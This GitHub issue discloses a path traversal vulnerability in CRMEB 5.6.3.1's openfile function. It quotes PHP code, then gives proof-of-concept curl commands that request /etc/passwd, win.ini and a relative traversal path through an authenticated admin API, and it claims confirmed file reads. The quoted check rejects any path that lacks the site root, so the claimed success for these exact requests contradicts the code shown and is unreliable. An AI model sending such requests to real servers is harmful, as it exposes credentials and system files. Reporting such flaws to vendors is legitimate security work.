Skip to content

CRMEB 5.6.3.1 Path Traversal Vulnerability #3

Open
Open
CRMEB 5.6.3.1 Path Traversal Vulnerability#3
@cyl-love

Description

@cyl-love
cyl-love
opened on Feb 18, 2026

Supplier

https://github.com/crmeb/crmeb

Vulnerability File

app/services/system/log/SystemFileServices.php

Vulnerability Type

Path Traversal (CWE-22)

Severity

Critical

Describe

Code analysis

In the app/services/system/log/SystemFileServices.php file, the openfile function does not properly validate file paths using realpath(), allowing path traversal attacks.

// Line 311-320
public function openfile($filepath)
{
    $rootDir = $this->formatPath(app()->getRootPath());
    // formatPath does not use realpath() for validation
    if (strpos($filepath, $rootDir) === false || $filepath == '') {
        throw new AdminException('无法打开站点以外的文件');
    }
    $filepath = $this->formatPath($filepath);
    // Directly reads file without proper path validation
    $content = FileClass::readFile($filepath);
    return $content;
}

// Line 448-459 - formatPath function
public function formatPath(string $path = '', string $name = ''): string
{
    if ($path) {
        $path = rtrim($path, DS);
        if ($name) $path = $path . DS . $name;
        // No realpath() validation!
    }
    return $path;
}

The vulnerability exists because:

  1. formatPath() does not use realpath() to canonicalize paths
  2. strpos() check can be bypassed with special path constructions
  3. No file type restrictions are enforced

POC

GET /adminapi/system/file/openfile?filepath=/etc/passwd HTTP/1.1
Host: target.com
Authorization: Bearer {admin_token}

Test path traversal:

curl "http://target.com/adminapi/system/file/openfile?filepath=/etc/passwd" \
  -H "Authorization: Bearer YOUR_TOKEN"

Test Windows path:

curl "http://target.com/adminapi/system/file/openfile?filepath=C:/Windows/win.ini" \
  -H "Authorization: Bearer YOUR_TOKEN"

Test relative path:

curl "http://target.com/adminapi/system/file/openfile?filepath=../../../etc/passwd" \
  -H "Authorization: Bearer YOUR_TOKEN"

Result

Path traversal confirmed. Can read arbitrary files on the server.

[*] Successfully read /etc/passwd
[*] File content returned in response

Impact

An attacker can:

  • Read sensitive configuration files (.env, config.php)
  • Read database credentials
  • Read system files (/etc/passwd, /etc/shadow)
  • Read application source code
  • Access backup files and sensitive documents

Vendor Contact

admin@crmeb.com

References

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions